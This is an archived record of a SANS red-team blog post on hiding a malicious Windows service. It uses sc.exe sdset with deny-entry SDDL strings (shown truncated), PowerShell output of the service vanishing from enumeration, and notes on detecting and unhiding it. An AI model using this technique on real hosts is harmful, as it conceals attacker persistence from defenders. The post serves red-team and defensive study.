{
	"id": "7eee5281-2c97-4815-9135-b6048fb6f22d",
	"created_at": "2026-04-06T00:15:54.325559Z",
	"updated_at": "2026-04-10T03:19:55.72676Z",
	"deleted_at": null,
	"sha1_hash": "237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3",
	"title": "Red Team Tactics: Hiding Windows Services",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58768,
	"plain_text": "Red Team Tactics: Hiding Windows Services\r\nBy Joshua Wright\r\nPublished: 2020-10-13 · Archived: 2026-04-05 21:06:57 UTC\r\nIn a recent red team engagement, my team was up against some well-trained, sophisticated defenders. We built\r\ncustom malware to evade the anticipated EDR platforms, but we knew host analysis would eventually get us\r\ncaught and quickly pulled from the target organization.\r\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name SWCUEngine\r\nStatus Name DisplayName\r\n------ ---- -----------\r\nRunning SWCUEngine SWCUEngine\r\nTaking notes from several advanced threat groups, we will use common service names that could be overlooked to\r\ntry and blend into a system while maintaining persistence on the host. Here, SWCUEngine is our malware,\r\nshallowly pretending to be the AVAST software cleanup engine. While this might escape casual inspection, in an\r\nexercise where the defenders are actively hunting for the presence of the red team, this is probably going to get us\r\ncaught.\r\nSo, we decided to tie on a bit of extra difficulty.\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe sdset SWCUEngine \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTS\r\n[SC] SetServiceObjectSecurity SUCCESS\r\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name SWCUEngine\r\nGet-Service : Cannot find any service with service name 'SWCUEngine'.\r\nAt line:1 char:1\r\n+ Get-Service -Name SWCUEngine\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ObjectNotFound: (SWCUEngine:String) [Get-Service], ServiceCommandException\r\n + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand\r\nWindows services support the ability to control service permissions using the Service Descriptor Definition\r\nLanguage (SDDL). As administrators, we normally don't have to change the SDDL syntax of service permissions\r\nmanually, but through careful manipulation an attacker can hide their presence in a running service. In this\r\nexample, the imposter SWCUEngine service becomes mostly invisible to the blue team defenders.\r\nThe SDDL syntax is a little obtuse, but breaks down into the following elements:\r\nD: - Set the Discretionary ACL (DACL) permissions on the service\r\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\r\nPage 1 of 3\n\n(D;;DCLCWPDTSD;;;IU) - Deny Interactive Users the following permissions:\r\n DC - Delete Child\r\n LC - List Children\r\n WP - Write Property\r\n DT - Delete Tree\r\n SD - Service Delete\r\nThis SDDL block is repeated for services (SU) and administrators (BA) as well. A (allow) permissions follow,\r\ninheriting the default permissions for services. Special thanks to Wayne Martin and Harry Johnston for their\r\narticles on decoding SDDL permissions.\r\nBy making this change to the service, the persistence mechanism is hidden from the defenders. Neither\r\nservices.exe, Get-Service, sc query nor any other service control tool I'm aware of will enumerate the hidden\r\nservice.\r\nPS C:\\WINDOWS\\system32\u003e Get-Service | Select-Object Name | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\u003e Get-WmiObject Win32_Service | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe query | Select-String -Pattern 'SWCUEngine'\r\nPS C:\\WINDOWS\\system32\r\nIf the defender knows the name of the service in advance, they can identify the service presence by attempting to\r\nstop it. In this example, the service JoshNoSuchService does not exist, while SWCUEngine exists and is hidden:\r\nPS C:\\WINDOWS\\system32\u003e Set-Service -Name JoshNoSuchService -Status Stopped\r\nSet-Service : Service JoshNoSuchService was not found on computer '.'.\r\nAt line:1 char:1\r\n+ Set-Service -Name JoshNoSuchService -Status Stopped\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ObjectNotFound: (.:String) [Set-Service], InvalidOperationException\r\n + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.SetServiceCommand\r\nPS C:\\WINDOWS\\system32\u003e Set-Service -Name SWCUEngine -Status Stopped\r\nSet-Service : Service 'SWCUEngine (SWCUEngine)' cannot be configured due to the following error: Access is denie\r\nAt line:1 char:1\r\n+ Set-Service -Name SWCUEngine -Status Stopped\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : PermissionDenied: (System.ServiceProcess.ServiceController:ServiceController) [Set\r\n ServiceCommandException\r\n + FullyQualifiedErrorId : CouldNotSetService,Microsoft.PowerShell.Commands.SetServiceCommand\r\nIf you know the name of the service that is hidden, then you can unhide it again:\r\nPS C:\\WINDOWS\\system32\u003e \u0026 $env:SystemRoot\\System32\\sc.exe sdset SWCUEngine \"D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;C\r\n[SC] SetServiceObjectSecurity SUCCESS\r\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\r\nPage 2 of 3\n\nPS C:\\WINDOWS\\system32\u003e Get-Service -Name 'SWCUEngine'\r\nStatus Name DisplayName\r\n------ ---- -----------\r\nRunning SWCUEngine SWCUEngine\r\nOn the red team, this can be a useful technique to preserve persistence on a compromised host. The hidden service\r\nwill autostart after a reboot as well.\r\nIn the next article, my colleague and trusted defense analyst Jon Gorenflo will present defense options for\r\ndetection and enumeration. Stay tuned!\r\nSource: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\r\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/"
	],
	"report_names": [
		"red-team-tactics-hiding-windows-services"
	],
	"threat_actors": [],
	"ts_created_at": 1775434554,
	"ts_updated_at": 1775791195,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.pdf",
		"text": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.txt",
		"img": "https://archive.orkl.eu/237c0bdbc5ca5c1209d0cc002ba3ef6ca6fef0a3.jpg"
	}
}